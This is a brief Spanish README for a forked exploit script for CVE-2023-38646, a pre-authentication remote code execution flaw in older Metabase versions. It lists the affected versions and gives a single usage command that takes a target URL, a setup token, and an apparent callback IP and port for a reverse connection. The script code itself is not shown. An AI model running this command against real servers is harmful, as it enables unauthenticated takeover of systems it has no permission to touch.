
CVE-2023-38646 Pre-Auth RCE en Metabase
Fork de kh4sh3i's eliminando la necesidad de Burp Collector.
CVE-2023-38646 (Pre-Auth RCE en Metabase):
Metabase open source anterior a 0.46.6.1 y Metabase Enterprise anterior a 1.46.6.1 permiten a atacantes ejecutar comandos arbitrarios en el servidor, al nivel de privilegio del servidor. No se requiere autenticación para la explotación.
python3 CVE-2023-38646.py -u http://target.com -t 349fa13d-fd94-4d9b-b54f-b4ebf2df682f -i 10.10.15.101 -p 5555
Para más información lee esta publicación.